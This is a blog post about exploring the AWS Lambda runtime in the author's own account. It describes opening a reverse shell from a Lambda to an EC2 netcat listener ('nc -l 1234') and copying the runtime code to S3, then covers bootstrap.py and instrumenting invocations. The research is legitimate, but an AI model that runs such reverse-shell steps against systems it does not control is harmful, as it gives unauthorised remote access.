Lambda Internals: Exploring AWS Lambda

Written by galbashan1 | Published 2018/04/15
Tech Story Tags: aws-lambda | software-engineering | software-architecture | python | research

TLDRvia the TL;DR App

Diving deep down. Photo by Talia Cohen

This article is the first part of a two-piece series. The next part is right here!

AWS Lambda is an excellent environment for rapid and scalable development. As a developer, I love using it. The main advantage of Lambda is that you can focus solely on your code. No more thinking about web-servers, machines, scalability and other issues for which you REALLY don’t care. Upload your code, say the magic words (aka serverless invoke) and your code is executed. However, just because you CAN ignore those things doesn’t mean you have to, right?

I believe that knowing your environment can be a handy tool, and it can also be fun, so I decided to explore the Lambda environment. There are a few stories that review the specs of the Lambda environment but my ultimate goal was to analyze not just the container of the Lambda but also the code of Lambda itself. I wanted to fully understand the code in charge of executing my code.

Focus sometimes means blurring out the rest. Is that really what we want? Image: Paul Skorupska

Despite my years as a security researcher, I decided to approach this problem with a developer mindset. Why? I want to know Lambda better in order to use it more effectively and have some fun along the way.

Getting Started

To begin my research, I first had to gain access to Lambda’s container. Also, I had to find the code that is executing my Lambda. If you don’t care about that and want to skip ahead to what I found out, you can jump to Lambda Internals.

Getting a Shell

I found that the easiest way to get a shell to the Lambda container is by using a Lambda that opens a reverse shell to a server. And what is the easiest way to get a server with a public IP for the Lambda to connect? Deploying an EC2 with an elastic IP, of course! Thank you, Amazon.

Here is the Lambda’s code:

I then set up a listening server on my EC2 using netcat: nc -l 1234

Finally, I created an event containing my IP and port (called event.json) and triggered my Lambda using the Serverless Framework:

cat event.json | serverless invoke -f shell

and as expected — we are in!

Simple Lambda shell

Downloading the Runtime

OK, getting a shell was easy. After all, Lambda lets us do pretty much whatever we want, including executing bash commands from within the Lambda. Next, I wanted to check where lays the code that executes my code, download it and start assessing it.

The first thing I did was running the ps command to check what processes are running:

Process running on a Lambda container

In the ps we can see that the only process that the user we are running as has access to (besides the shell and ps that we invoked from within the Lambda) is a python script residing in /var/runtime/awslambda. That is probably the script that is executing our code! So the next thing I did was check the content of that directory:

The content of the /var/runtime and the /var/runtime/awslambda directories

The directory content looks very promising, so let’s download it! If your background is security research like mine, you might consider printing the files in hex / base64 / uploading them to an FTP server in order to get them. But wait a minute — we are running on AWS here! There is a much, much simpler way.

Since we have boto3 (or aws-sdk if you are running node) build in with Lambda, the easiest way to get the code is uploading it to an S3 bucket! Here is the Lambda I used to download all the code of the runtime environment of the Lambda:

And after creating an event containing the bucket name and executing the Lambda, this is what we get:

AWS S3 interface. We can see the tar we uploaded from the Lambda

So now we have the Lambda’s runtime code. Let’s see what we can learn from it.

Lambda Internals

From a quick look at the code and binaries we downloaded we can already get a pretty good understanding of the system. We are exposed to three main components which are managing the Lambda’s execution:

  1. awslambda/bootstrap.py — a Python wrapper which controls the Lambda invocation. Waits for a first trigger to initialize the Lambda, and then initializes and invokes it. After that enters a loop of waiting for an event and invoking the Lambda (and initializing the module again if required)
  2. awslambda/runtime.so — a Python compatible shared object which bootstrap.py imports. Acts as a pythonic interface to the other shared object containing the Lambda runtime management core.
  3. liblambda*.so — four libraries in charge of IO, IPC, log and the runtime of the Lambda. The most interesting one is liblambdaruntime.so, which is in charge of all the heavy lifting of managing the Lambda: receiving trigger events, sending events to the slicer (component in charge of allocating CPU time for our Lambdas) on Lambda execution start / stop, parsing X-Ray’s trace id and much more.

After having an overview of the system, let’s start playing with the components we discovered! In this article, I will dive into an example of utilizing bootstrap.py to our needs.

Instrumenting bootstrap.py

Imagine you would like to have a monitoring system that collects all your Lambdas and displays them in a centralized location. It could be that you want to print additional messages in a given format to the Cloudwatch Logs in all of your invocations; or that all of your Lambdas download a shared resource at the beginning of each Lambda from S3. These are just a few cases where you have to add code at the beginning of each of your Lambdas by using a function call or decorator.

But what if there is another way? Here at Epsagon, where we develop a monitoring utility tailor-made for the serverless architecture, we wanted to find out if there was a better way to instrument every Lambda invocation. Our goal was to achieve 100% invocation coverage while causing minimal changes to the existing code of the instrumented Lambda.

While reviewing bootstrap.py, I found out there are two functions which in turn invoked my Lambda: handle_event_request and handle_http_request. I chose to focus on handle_event_request, but you can apply the same principle to handle_http_request. I created a Python module called instrumenter.py. On import, this module instruments every Lambda invocation to print a log at the beginning (this, of course, can be changed to act as required).

This is the most straightforward wrapper possible (better argument handling should be used, for example) but for the purpose of this research, it was enough. The next thing I did was defining a simple Lambda that imports this library:

And it worked!

Our wrapper instrumented the Lambda invocation and added the log

This new method allows libraries to trace and act on Lambda invocations with very little change to their code: a single import line! This can be really useful for us at Epsagon, and hopefully to many others as well.

Conclusion

Exploring Lambda internals was both fun and productive. We managed to execute commands on Lambda’s container, download Lambda’s runtime environment and even instrument any Lambda invocation! I will keep on exploring Lambda’s environment, next up digging deeper into the binary libraries. Let me know if there are any more serverless topics you would like to read about, and stay tuned!

Here is the link to an open source project containing all the code I used during my explorations. For most of the examples throughout the article I used Python, but in the project there are the some matching Node.js utilities as well. If you find it useful, let me know!


Published by HackerNoon on 2018/04/15